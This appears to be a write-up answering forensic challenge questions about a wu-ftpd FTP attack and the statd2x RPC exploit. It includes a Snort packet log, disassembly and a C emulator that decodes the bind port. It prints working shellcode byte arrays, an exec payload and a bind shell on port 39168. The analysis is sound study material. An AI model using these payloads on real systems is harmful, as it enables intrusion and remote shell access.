QUESTION 1: Can you name the FTP scanning tool that uses a half open SYN?

myscan is my guess: http://www.google.com/search?q=10101+th_sport

QUESTION 2: What does the FTP exploit achieve? Does it open a port, create a shell, add a user?

I found some similar FTP attacks by using part of the shellcode from snort as a search string in google:
http://www.google.com/search?q=%228D+5E+08+89+43+02+31%22

Some further googling on wuftpd exploits:
http://archives.neohapsis.com/archives/bugtraq/2000-06/0214.html
http://archives.neohapsis.com/archives/bugtraq/2000-06/0229.html

I think the exploit used is the first one. The word 'venglin' is the end of the shellcode for BSD. I haven't looked at how the kachum.kasie.com is added, but in the first code a memcpy is used which might drop the terminating zero. From this code it looks like the BSD shellcode was used on the Linux box. It probably just execs a shell on port 21. Anyway, the exploit didn't succeed:

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:31.169534 172.16.1.104:21 -> 207.219.207.240:1882
TCP TTL:63 TOS:0x10 ID:48231 DF
*****PA* Seq: 0x110CE81E  Ack: 0x33BC7446  Win: 0x7D78
TCP Options => NOP NOP TS: 105803113 126045057
35 33 30 20 4C 6F 67 69 6E 20 69 6E 63 6F 72 72  530 Login incorr
65 63 74 2E 0D 0A                                ect...

The PASS was only used to pass in the shellcode for use with the SITE EXEC format string bug.

QUESTION 5: Where in the RPC exploit code does it bind a shell to port 39168?
This is a published statd exploit (statd2x):
http://archives.neohapsis.com/archives/bugtraq/2000-10/0165.html

From the code:

char exec[] = /* any command */
    "\xeb\x2d\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x89\x76\x0b\x89\x76"
    "\x0f\x80\x46\x0f\x08\x89\x76\x13\x80\x46\x13\x1b\x89\x46\x17\x8d"
    "\x56\x17\x8d\x4e\x0b\x89\xf3\xb0\x0b\xcd\x80\xb0\x01\xcd\x80\xe8"
    "\xce\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x5f\x2d\x63\x5f\xff"
    "\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff";

char port[] = /* port 39168 */
    "\x31\xc0\xeb\x7c\x59\x89\x41\x10\x89\x41\x08\xfe\xc0\x89\x41\x04"
    "\x89\xc3\xfe\xc0\x89\x01\xb0\x66\xcd\x80\xb3\x02\x89\x59\x0c\xc6"
    "\x41\x0e\x99\xc6\x41\x08\x10\x89\x49\x04\x80\x41\x04\x0c\x88\x01"
    "\xb0\x66\xcd\x80\xb3\x04\xb0\x66\xcd\x80\xb3\x05\x30\xc0\x88\x41"
    "\x04\xb0\x66\xcd\x80\x89\xce\x88\xc3\x31\xc9\xb0\x3f\xcd\x80\xfe"
    "\xc1\xb0\x3f\xcd\x80\xfe\xc1\xb0\x3f\xcd\x80\xc7\x06\x2f\x62\x69"
    "\x6e\xc7\x46\x04\x2f\x73\x68\x41\x30\xc0\x88\x46\x07\x89\x76\x0c"
    "\x8d\x56\x10\x8d\x4e\x0c\x89\xf3\xb0\x0b\xcd\x80\xb0\x01\xcd\x80"
    "\xe8\x7f\xff\xff\xff";

> Can you be more specific? I still can't find the bind to port 39168
> in the char port[] code.

Most of the time the zero is created differently. Here is part of the code (the jmp eventually returns to port+4):

0x8049520 : xor %eax,%eax
0x8049522 : jmp 0x80495a0
0x8049524 : pop %ecx
0x8049525 : mov %eax,0x10(%ecx)    <- writing zeros
0x8049528 : mov %eax,0x8(%ecx)     <- writing zeros
0x804952b : inc %al
0x804952d : mov %eax,0x4(%ecx)
0x8049530 : mov %eax,%ebx
0x8049532 : inc %al
0x8049534 : mov %eax,(%ecx)
0x8049536 : mov $0x66,%al
0x8049538 : int $0x80

Above is a sys_socket call (socketcall with arg 1).

0x804953a : mov $0x2,%bl
0x804953c : mov %ebx,0xc(%ecx)
0x804953f : movb $0x99,0xe(%ecx)
0x8049543 : movb $0x10,0x8(%ecx)
0x8049547 : mov %ecx,0x4(%ecx)
0x804954a : addb $0xc,0x4(%ecx)
0x804954e : mov %al,(%ecx)
0x8049550 : mov $0x66,%al
0x8049552 : int $0x80

Above is a sys_bind call.
You see the 0x99 being written to an area already containing zeros.

0x8049554 : mov $0x4,%bl
0x8049556 : mov $0x66,%al
0x8049558 : int $0x80

Above is the sys_listen call. Simple as that :-)

Job
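The mechanism Job describes (the 0x99 landing on top of a zero that the 4-byte store of %ebx=2 left at offset 0xf, so sin_port reads 0x99 0x00 in network order, i.e. 39168), worked through as an added example. This is not code from the thread or from statd2x: it copies the port[] bytes from the post as data only and never executes them, replays the stores from the disassembly into a scratch buffer that stands in for the memory %ecx points at, and then decodes the sockaddr the way sys_bind would. It assumes the Linux/x86 target the shellcode was written for (little-endian host order, 2-byte family, 2-byte port, 4-byte address in struct sockaddr_in) and that socket() returned fd 3.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <stddef.h>

/* port[] from the statd2x post, kept as data only; nothing here executes it. */
static const unsigned char port_sc[] =
    "\x31\xc0\xeb\x7c\x59\x89\x41\x10\x89\x41\x08\xfe\xc0\x89\x41\x04"
    "\x89\xc3\xfe\xc0\x89\x01\xb0\x66\xcd\x80\xb3\x02\x89\x59\x0c\xc6"
    "\x41\x0e\x99\xc6\x41\x08\x10\x89\x49\x04\x80\x41\x04\x0c\x88\x01"
    "\xb0\x66\xcd\x80\xb3\x04\xb0\x66\xcd\x80\xb3\x05\x30\xc0\x88\x41"
    "\x04\xb0\x66\xcd\x80\x89\xce\x88\xc3\x31\xc9\xb0\x3f\xcd\x80\xfe"
    "\xc1\xb0\x3f\xcd\x80\xfe\xc1\xb0\x3f\xcd\x80\xc7\x06\x2f\x62\x69"
    "\x6e\xc7\x46\x04\x2f\x73\x68\x41\x30\xc0\x88\x46\x07\x89\x76\x0c"
    "\x8d\x56\x10\x8d\x4e\x0c\x89\xf3\xb0\x0b\xcd\x80\xb0\x01\xcd\x80"
    "\xe8\x7f\xff\xff\xff";
#define PORT_SC_LEN (sizeof port_sc - 1)   /* drop the string literal's NUL */

/* Find "movb $imm8,0xe(%ecx)" (opcode c6 41 0e imm8) and return the port it
 * sets. Offset 0xe is the high byte of sin_port in network order; the low byte
 * is the zero at 0xf left by "mov %ebx,0xc(%ecx)" with %ebx=2, so port = imm8<<8. */
int find_bind_port(const unsigned char *sc, size_t n)
{
    for (size_t i = 0; i + 3 < n; i++)
        if (sc[i] == 0xc6 && sc[i + 1] == 0x41 && sc[i + 2] == 0x0e)
            return (int)sc[i + 3] << 8;
    return -1;                      /* no such store: not this bind pattern */
}

/* struct sockaddr_in as Linux/x86 lays it out (the shellcode's target). */
struct linux_sockaddr_in {
    uint16_t family;                /* host (little-endian) order, 2 = AF_INET */
    uint16_t port_be;               /* network (big-endian) order              */
    uint32_t addr_be;               /* network order, 0 = INADDR_ANY           */
    uint8_t  zero[8];
};

/* The three socketcall arguments sys_bind receives. */
struct bind_call {
    uint32_t fd;                    /* args[0], copied from %al             */
    uint32_t addrlen;               /* args[2], 0x10                        */
    struct linux_sockaddr_in addr;  /* *args[1], the 16 bytes at %ecx+0xc   */
};

static void st32(unsigned char *p, uint32_t v)      /* little-endian dword store */
{
    p[0] = (unsigned char)v;         p[1] = (unsigned char)(v >> 8);
    p[2] = (unsigned char)(v >> 16); p[3] = (unsigned char)(v >> 24);
}
static uint32_t ld32le(const unsigned char *p)      /* little-endian dword load */
{
    return p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static unsigned ld16le(const void *p) { const unsigned char *b = p; return b[0] | b[1] << 8; }
static unsigned ld16be(const void *p) { const unsigned char *b = p; return b[0] << 8 | b[1]; }

/* Replay the stores in the disassembly above into a scratch area that stands
 * in for the memory %ecx points at. The area is filled with junk on purpose:
 * every zero that bind() relies on is written by the shellcode itself.
 * socket() is assumed to return fd 3 (first free descriptor after 0,1,2). */
struct bind_call emulate_bind(void)
{
    unsigned char mem[0x20];        /* %ecx -> mem[0]                        */
    uint32_t eax, ebx;
    struct bind_call call;

    memset(mem, 0xaa, sizeof mem);

    eax = 0;                        /* xor %eax,%eax                         */
    st32(mem + 0x10, eax);          /* mov %eax,0x10(%ecx)   sin_addr = 0    */
    st32(mem + 0x08, eax);          /* mov %eax,0x8(%ecx)    protocol = 0    */
    eax++;                          /* inc %al                               */
    st32(mem + 0x04, eax);          /* mov %eax,0x4(%ecx)    SOCK_STREAM     */
    ebx = eax;                      /* mov %eax,%ebx         SYS_SOCKET      */
    eax++;                          /* inc %al                               */
    st32(mem + 0x00, eax);          /* mov %eax,(%ecx)       AF_INET         */
    eax = 3;                        /* int $0x80: socketcall(SYS_SOCKET), assumed fd 3 */

    ebx = 2;                        /* mov $0x2,%bl          SYS_BIND        */
    st32(mem + 0x0c, ebx);          /* mov %ebx,0xc(%ecx)    family=2, bytes 0xd..0xf = 0 */
    mem[0x0e] = 0x99;               /* movb $0x99,0xe(%ecx)  port high byte  */
    mem[0x08] = 0x10;               /* movb $0x10,0x8(%ecx)  addrlen = 16    */
    /* mov %ecx,0x4(%ecx); addb $0xc,0x4(%ecx): args[1] = &mem[0xc]          */
    mem[0x00] = (unsigned char)eax; /* mov %al,(%ecx)        args[0] = fd    */
    /* int $0x80: socketcall(SYS_BIND, %ecx) would run here                  */

    call.fd = ld32le(mem + 0x00);
    call.addrlen = ld32le(mem + 0x08);
    memcpy(&call.addr, mem + 0x0c, sizeof call.addr);
    return call;
}

/* Accessors that decode the struct the way the kernel on the target would. */
int emulated_bind_port(void)      { struct bind_call c = emulate_bind(); return (int)ld16be(&c.addr.port_be); }
int emulated_bind_family(void)    { struct bind_call c = emulate_bind(); return (int)ld16le(&c.addr.family); }
uint32_t emulated_bind_addr(void) { struct bind_call c = emulate_bind(); return c.addr.addr_be; }
unsigned emulated_bind_addrlen(void) { return emulate_bind().addrlen; }
unsigned emulated_bind_fd(void)      { return emulate_bind().fd; }

int main(void)
{
    printf("from opcode scan:      port %d\n", find_bind_port(port_sc, PORT_SC_LEN));
    printf("from replayed stores:  bind(fd=%u, {family=%d, port=%d, addr=0x%08x}, len=%u)\n",
           emulated_bind_fd(), emulated_bind_family(), emulated_bind_port(),
           (unsigned)emulated_bind_addr(), emulated_bind_addrlen());
    return 0;
}
```

The opcode scan is the quick check when reading bind shellcode of this family: the port never appears as a 16-bit constant, only as the one non-zero byte that gets stored into an already-zeroed sockaddr, which is why grepping the bytes for 0x9900 finds nothing.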